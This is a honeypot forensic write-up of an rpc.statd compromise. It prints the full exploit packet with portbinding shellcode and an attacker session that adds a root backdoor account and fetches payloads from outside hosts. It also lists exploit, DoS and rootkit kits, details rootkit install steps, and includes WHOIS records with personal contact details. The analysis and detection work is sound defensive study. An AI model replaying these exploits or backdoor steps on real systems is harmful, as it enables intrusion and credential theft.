Refer: SID 587
Refer: arachNIDS
Sure enough, shortly after the initial alert the exploitation takes place. The shellcode is an exact match for a published statd exploit by ron1n called statdx.c. It is non-ripped linux IA32 portbinding shellcode, port 39168 and 133 bytes.
Refer: SID 600
Refer: arachNIDS
Refer: Bugtraq
The signs of the compromise point to an autorooter, which is an entire process that is automated, from the scan, identification of running service, to exploitation. Here is what takes place, ending with the payload of the exploit. Time in hh:mm:ss format.
18:58:07 - 66.206.21.1 sends SYN to honeypot on port 111 18:58:07 - honeypot responds SYN/ACK to 66.206.21.1 18:58:07 - 66.206.21.1 sends ACK to honeypot 18:58:08 - 66.206.21.1 sends "RPC GETPORT Call" to honeypot 18:58:08 - honeypot sends "RPC GETPORT Reply" to 66.206.21.1 indicating its RPC port is listening on UDP 933 18:58:08 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd 18:58:10 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd 18:58:12 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd
I say it's likely an autorooter because I don't believe an attacker would try and exploit portmapper three times in a row with a seperation of attempts at exactly two second intervals.
0000 00 80 c8 48 22 b7 00 06 2a cf f0 70 08 00 45 00 ..ÈH"·.. *Ïðp..E. 0010 04 50 00 00 40 00 32 11 24 2f 42 ce 15 01 44 75 .P..@.2. $/BÎ..Du 0020 84 2a e7 e6 03 a5 04 3c 87 8d 2d c1 b2 86 00 00 .*çæ.¥.< ..-Á²... 0030 00 00 00 00 00 02 00 01 86 b8 00 00 00 01 00 00 ........ .¸...... 0040 00 01 00 00 00 01 00 00 00 20 3d e4 19 44 00 00 ........ . =ä.D.. 0050 00 09 6c 6f 63 61 6c 68 6f 73 74 00 00 00 00 00 ..localh ost..... 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 0070 00 00 00 00 03 e7 18 f7 ff bf 18 f7 ff bf 19 f7 .....ç.÷ ÿ¿.÷ÿ¿.÷ 0080 ff bf 19 f7 ff bf 1a f7 ff bf 1a f7 ff bf 1b f7 ÿ¿.÷ÿ¿.÷ ÿ¿.÷ÿ¿.÷ 0090 ff bf 1b f7 ff bf 25 38 78 25 38 78 25 38 78 25 ÿ¿.÷ÿ¿%8 x%8x%8x% 00a0 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x %8x%8x%8 00b0 78 25 32 33 36 78 25 6e 25 31 33 37 78 25 6e 25 x%236x%n %137x%n% 00c0 31 30 78 25 6e 25 31 39 32 78 25 6e 90 90 90 90 10x%n%19 2x%n.... (0x90 NOPs) 03c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........ 03d0 90 90 90 90 90 90 90 90 31 c0 eb 7c 59 89 41 10 ........ 1Àë|Y.A. 03e0 89 41 08 fe c0 89 41 04 89 c3 fe c0 89 01 b0 66 .A.þÀ.A. .ÃþÀ..°f 03f0 cd 80 b3 02 89 59 0c c6 41 0e 99 c6 41 08 10 89 Í.³..Y.Æ A..ÆA... 0400 49 04 80 41 04 0c 88 01 b0 66 cd 80 b3 04 b0 66 I..A.... °fÍ.³.°f 0410 cd 80 b3 05 30 c0 88 41 04 b0 66 cd 80 89 ce 88 Í.³.0À.A .°fÍ..Î. 0420 c3 31 c9 b0 3f cd 80 fe c1 b0 3f cd 80 fe c1 b0 Ã1É°?Í.þ Á°?Í.þÁ° 0430 3f cd 80 c7 06 2f 62 69 6e c7 46 04 2f 73 68 41 ?Í.Ç./bi nÇF./shA 0440 30 c0 88 46 07 89 76 0c 8d 56 10 8d 4e 0c 89 f3 0À.F..v. .V..N..ó 0450 b0 0b cd 80 b0 01 cd 80 e8 7f ff ff ff 00 °.Í.°.Í. è.ÿÿÿ. |
cd /; uname -a; id; Linux test 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown uid=0 (root) gid=0 (root) w 5:27pm up 51 days, 10:16, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - 6Oct 2 42:28m 27:28 27:27 /usr/local/bin/ root tty2 - 16Nov 2 5days 0.25s 0.14s -bash /usr/sbin/adduser -g 0 -u 0 kernel passwd kernel New UNIX password: lordluke Retype new UNIX password: lordluke Changing password for user kernel passwd: all authentication tokens updated successfully /usr/sbin/adduser httpd passwd httpd New UNIX password: lordluke Retype new UNIX password: lordluke Changing password for user httpd passwd: all authentication tokens updated successfully |
Machine A - performed the exploit
p0f output: 66.206.21.1 [15 hops]: Linux 2.4.2 - 2.4.14 (1)
[whois.arin.net] OrgName: Cyber World Internet Services OrgID: CWIS NetRange: 66.206.0.0 - 66.206.31.255 CIDR: 66.206.0.0/19 NetName: CYBERWORLD-INT NetHandle: NET-66-206-0-0-1 Parent: NET-66-0-0-0-0 NetType: Direct Allocation NameServer: NS0.NIC-REG-DNS.COM NameServer: NS1.NIC-REG-DNS.COM Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE RegDate: 2001-12-04 Updated: 2002-03-08 TechHandle: AS1239-ARIN TechName: Slocombe, Alvin TechPhone: +1-509-343-2100 TechEmail: alvins@cwiservices.com # ARIN Whois database, last updated 2002-11-29 19:05 # Enter ? for additional hints on searching ARIN's Whois database. |
Machine B - used to telnet to the honeypot
p0f output: 80.97.35.83 [24 hops]: Windows 9x (1) *
[whois.ripe.net] % This is the RIPE Whois server. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/ripencc/pub-services/db/copyright.html inetnum: 80.97.35.0 - 80.97.35.127 netname: EUROSAT descr: SC EUROSAT SRL descr: Str.Gen.Dragalina Nr.2A descr: Jud.Caras-Severin descr: 1650 Caransebes country: ro admin-c: TP3713-RIPE tech-c: MB10985-RIPE status: ASSIGNED PA mnt-lower: AS3233-MNT mnt-by: AS3233-MNT mnt-routes: AS12302-MNT notify: domain-admin@listserv.rnc.ro changed: cristih@rnc.ro 20010909 changed: cristih@rnc.ro 20020104 source: RIPE route: 80.97.32.0/20 descr: Mobifon S.A. descr: Romania origin: AS12302 notify: isp.support@connex.ro mnt-by: AS12302-MNT changed: isp.support@connex.ro 20020412 source: RIPE person: Traian Plesa address: SC EUROSAT SRL address: Str.Gen.Dragalina Nr.2A address: Caransebes address: RO address: Postal Code: 1650 address: Registration/ID Number: J11/1287/1992 address: Fiscal Code: R3060228 phone: +40-255-516318 fax-no: +40-255-516318 e-mail: traian@eurosat.terrasat.ro nic-hdl: TP3713-RIPE notify: domain-admin@listserv.rnc.ro mnt-by: AS3233-MNT changed: cristih@rnc.ro 20010909 changed: cristih@rnc.ro 20021001 source: RIPE person: Marius Buda address: SC EUROSAT SRL address: Str.Gen.Dragalina Nr.2A address: Caransebes address: RO address: 1650 phone: +40-744-500895 fax-no: +40-255-516318 e-mail: marius_buda@yahoo.com nic-hdl: MB10985-RIPE notify: domain-admin@listserv.rnc.ro mnt-by: AS3233-MNT changed: cristih@rnc.ro 20010909 changed: cristih@rnc.ro 20021001 source: RIPE |
If I had to make an educated guess, I would say that Machine A is a compromised machine that is being used to scan and exploit other vulnerable machines via an autorooter. Machine B is possibly a compromised machine but may be the hacker's personal machine in Romania.
On to the telnet session with the newly created accounts:
Red Hat Linux release 6.2 (Zoot) Kernel 2.2.14-5.0 on an i586 login: kernel Password: Login incorrect login: httpd Password: [httpd@test httpd]$ su kernel Password: [root@test httpd]# w 5:29pm up 51 days, 10:18, 3 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - 6Oct 2 42:30m 27:28 27:27 /usr/local/bin/ root tty2 - 16Nov 2 5days 0.25s 0.14s -bash httpd pts/0 80.97.35.83 5:29pm 0.00s 0.61s ? - [root@test httpd]# wget www.geocities.com/ozlamer/psybnc.tgz bash: wget: command not found [root@test httpd]# rpm -ivh --force ftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm Retrieving ftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm error: skipping ftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm - transfer failed - Unknown or unexpected error warning: u 0x813af50 ctrl 0x813fd40 nrefs != 0 (ftp.intraware.com ftp) [root@test httpd]# clear [root@test httpd]# ftp 209.139.200.32 Connected to 209.139.200.32. 220 Serv-U FTP Server v3.0 for WinSock ready... Name (209.139.200.32:httpd): dels 331 User name okay, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd .web 250 Directory changed to /.web ftp> get r.tgz local: r.tgz remote: r.tgz PORT Command successful. 150 Opening BINARY mode data connection for r.tgz (3607329 bytes). 226 Transfer complete. 3607329 bytes received in 77.6 secs (45 Kbytes/sec) ftp> bye 221 Goodbye! [root@test httpd]# tar zxvf r.tgz output [root@test httpd]# rm -rf r.tgz [root@test httpd]# cd X [root@test X]# ./install operator akteam 54321 output [root@test X]# wget bash: wget: command not found [root@test X]# cd .. [root@test httpd]# rm -rf X [root@test httpd]# exit [httpd@test httpd]$ exit logout |
On a comical sidenote, the second rootkit by default sends via email various informational tidbits to the attacker. These include ifconfig output, sniffed usernames/passwords from inbound or outbound sessions, and login credentials from the console. Well, the default yahoo.com address the attacker used as their email address apparently wasn't working (because that traffic is not allowed outbound from the bridge) so the attacker decided to send test messages to an email account from a domain I can only believe is their place of professional employment.
Files retrieved to honeypot follow, with a brief explanation.
I was able to obtain these files via tcpdump log files.
I used tcpslice to combine multiple tcpdump style log files into one.
Then I used ethereal to load the capture and specify the filter
"tcp.port eq 20 and not tcp.checksum_bad", chose relevant ftp session,
chose Follow TCP Stream option, and saved the file.
r.tgz SSH Backdoor Server By Akamai-Team
srk3.tar Sin Rootkit 3.0
nebunu.tgz+
|-apache Bash wrapper to exploit Apache using httpdtype and openssl
|-httpdtype determines type of web server running on a host
|-open OpenSSL remote apache exploit for BSD
|-openssl OpenSSL remote exploit
|-pinky variant of apache
|-root FTPD MassRooter
|-scanssl OpenSSL vulnerability scanner
|-script Bash wrapper for apache taking ip as argument
|-start wrapper for root but substitutes port 443 for 21 (!)
haos.tgz+
|-libpcap-0.6.2 libpcap
|-.i.c scans arbitrary port(s) of all users on a specified IRC channel
|-.ii.c same as .i.c but with different #define of IRC server
|-.iii.c same as .i.c but with different #define of IRC server
|-.iiii.c same as .i.c but with different #define of IRC server
|-.ip reads .sv and performs SSH exploit using Denyed(2)
|-.s.c arbitrary TCP port scanner
|-.sv 0-length file
|-.v SSH version mapper
|-.x SSH autorooter utilizing Denyed(2)
|-h= one domain name pointer (possible vulnerable host?)
|-hh= one domain name pointer (possible vulnerable host?)
|-targets.txt SSH offsets
|-targets SSH offsets
|-Denyed(1) autoroot wrapper for 7350wurm
|-Denyed(2) SSH exploit
|-dat1 wrapper for dat2
|-dat2 rpc.statd exploit
|-haosv HTTP version identifier
|-haosx wrapper for dat1
|-haosp arbitrary TCP port scanner
|-FTP FTPD autorooter
|-7350wurm wu-ftpd exploit
flood.tgz+
|-broadcast.txt list of smurf amplifiers
|-juno DoS tool
|-madscan.c finds smurf amplifiers
|-slice2 DoS tool
|-smurf6-linux+LPG.c DoS tool utilizing smurf amplifiers
|-vadimI DoS tool
|-vadimI.c truncated binary
|-vadimII.c DoS tool
There seems to be a common theme among the programs that the attacker
downloaded to the honeypot - scanning and exploiting other systems. The
purpose of doing this is not certain, perhaps building up a fleet of
DDoS zombies. There is quite a nice little arsenal of DoS tools.
The Sin Rootkit is a rather simple rootkit and it's install script is in shell.
Let's look further at what it performs by dissection of this script:
- unset HISTFILE - chattr -iau of files to be modified whichs removes immutable, append and undeletable attribute flags - remove /var/lock/subsys/atd and kill atd - replace syslogd with trojaned copy - stop syslog and restart it - copy list of processes to not show to /dev/ttyop - copy list of ports and ip addresses to not show to /dev/ttyoa - copy list of filenames to not list to /dev/ttyof - copy list of lognames to not log to /dev/ttyos - touch -acmr trojaned binaries to system binaries which sets correct access and modification time - chmod +s chsh which sets user or group ID on execution and replace chsh - replace system binaries with trojaned binaries - chkconfig --add atd and link trojaned atd SysV init to system atd SysV init - install DoS tools in /usr/bin/ - install linsniffer, which sniffs usernames and passwords for popular protocols - install sshd backdoor - replace either xinetd or inet with trojaned copy, chkconfig --add inet and restart inet - add crontab entry to email ifconfig output, hostname and sniffed traffic to author (attacker is supposed to change this email address, author gets a treat if not done) - check for other rootkits - send email with sysinfo to the author - start syslog - clean text in current logs - chattr +i of modified files which adds immutable flagThe /dev/ttyo{p,a,f,s} files contain the things to not display when the trojanized binaries are run. This is a typical rootkit footprint. By running strings on the trojaned binaries, for instance netstat, /dev/ttyoa is shown.
Now on to some light investigation of the still running honeypot. One tool that attempts to locate rootkits on a machine is chkrootkit. This tool operates under a simple logic, looking for known signatures of the most popular rootkits. For instance it runs strings on binaries looking for rootkit signatures, checks for network interfaces in promiscuous mode, and attempts to find sniffer logs and rootkit config files. It is important to note that chkrootkit will use a handful of system binaries to do its analysis, so it is recommended to use known good binaries. Here is the ouput of chkrootkit in quiet mode:
#./chkrootkit -q Checking `chsh'... INFECTED Checking `ifconfig'... INFECTED /dev/.haos/haos1/.f/Denyed /usr/lib/perl5/5.00503/i386-linux/.packlist /usr/lib/perl5/site_perl/5.005/i386- linux/auto/MD5/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/mod_perl /.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Irssi/.packlist /usr/l ib/perl5/site_perl/5.005/i386-linux/auto/Irssi/Irc/.packlist /usr/lib/perl5/site _perl/5.005/i386-linux/auto/Irssi/UI/.packlist /usr/lib/perl5/site_perl/5.005/i3 86-linux/auto/Irssi/TextUI/.packlist /usr/lib/linuxconf/install/gnome/.directory /usr/lib/linuxconf/install/gnome/.order /usr/lib/.lib /usr/lib/sn/.X /usr/lib/s n/.sys /usr/lib/ld/.X /usr/man/man1/... /usr/man/man1/.../.m /usr/man/man1/.../. w /lib/modules/2.2.14-5.0/.rhkmvtag Possible t0rn rootkit installed eth0 is PROMISC user root deleted or never loged from lastlog! |
/usr/lib/.lib /usr/lib/sn/.X /usr/lib/sn/.sys /usr/lib/ld/.X /usr/man/man1/... /usr/man/man1/.../.m /usr/man/man1/.../.wBelow is a look through modified files in the past week which reveals what was modified on the honeypot. Remember that I have the luxury of getting a concise output of modified files whereas a compromised and heavily used production system would have a lot of legitimately modified files.
# find / -type f -mtime -7 | grep -v proc /var/lib/slocate/slocate.db /var/lib/logrotate.status /var/log/lastlog /var/log/httpd/error_log /var/log/httpd/access_log /var/log/wtmp /var/log/sendmail.st /var/log/secure /var/log/maillog /var/log/spooler /var/log/xferlog /var/log/boot.log /var/log/cron /var/log/messages.1 /var/log/maillog.1 /var/log/cron.1 /var/run/utmp /var/run/syslogd.pid /var/run/inetd.pid /var/run/sshd2_54321.pid /var/run/sshd.pid /var/spool/mail/root /var/spool/anacron/cron.daily /var/spool/anacron/cron.weekly /var/spool/mqueue/qfRAA31158 /var/spool/mqueue/qfOAA08951 /var/spool/mqueue/dfRAA31158 /var/spool/mqueue/qfRAA31317 /var/spool/mqueue/dfRAA31317 /var/spool/mqueue/qfRAA31852 /var/spool/mqueue/dfOAA08951 /var/spool/mqueue/dfRAA31852 /var/spool/mqueue/qfOAA08957 /var/spool/mqueue/dfOAA08957 /var/tmp/rpm-xfer.c4TACW /tmp/info_tmp /dev/sbin/system /dev/.haos/haos2/.f/.s /dev/.haos/haos2/.f/.sv /dev/.haos/haos2/.f/h /dev/.haos/dos/juno /dev/.haos/arhive/flood.tgz /usr/lib/perl5/man/whatis /usr/lib/libc/libp /usr/lib/libc/libto /usr/lib/libc/libpt /usr/lib/libc/liblsf /usr/lib/libc/liblst /usr/lib/libc/libifc /usr/lib/libc/libph /usr/lib/libc/libif /usr/lib/libc/libah /usr/lib/.lib/libdi /usr/lib/.lib/libne /usr/lib/.lib/libloc /usr/lib/.lib/libdu /usr/lib/.lib/libvd /usr/lib/.lib/liblo /usr/lib/.lib/libnh /usr/lib/.lib/libfh /usr/lib/sn/.X /usr/lib/sn/.sys /usr/lib/ld/.X /usr/lib/ld/chat /usr/man/whatis /usr/X11R6/man/whatis /usr/bin/irqd /usr/info/.t0rn/shdcf /usr/info/.t0rn/shrs /usr/local/man/whatis /usr/src/.puta/.1addr /usr/src/.puta/.1file /usr/src/.puta/.1logz /usr/src/.puta/system /etc/group /etc/passwd /etc/rc.d/rc1.d/etc/rc.d/rc1.d/rc.tgz /etc/rc.d/rc.sysinit /etc/passwd- /etc/shadow- /etc/shadow /etc/gshadow /etc/passwd.OLD /etc/ttyhash /etc/psdevtab /bin/login /home/httpd/.emacs /home/httpd/.bash_logout /home/httpd/.bash_profile /home/httpd/.bashrc /home/httpd/.screenrc /home/kernel/.emacs /home/kernel/.bash_logout /home/kernel/.bash_profile /home/kernel/.bashrc /home/kernel/.screenrc /home/kernel/.bash_history / /rs /.haos/dos/juno |
In conclusion, I have to say that there was not anything within the compromise that was groundbreaking in the world of security. This type of compromise happens every single day to machines on the internet. I would like to add that the attacker really did make a mess of the filesystem with files and directories strewn about. I would never feel comfortable, in the case the honeypot was a production system, in simply trying to remove the attackers files and replacing binaries. There is no option except wiping the disk and reinstalling the operating system. I can only recommend keeping up with the latest security patches, deploying intrusion detection technologies like Snort in order to detect possible breaches, and installing file integrity or host intrusion detection systems like Samhain or AIDE.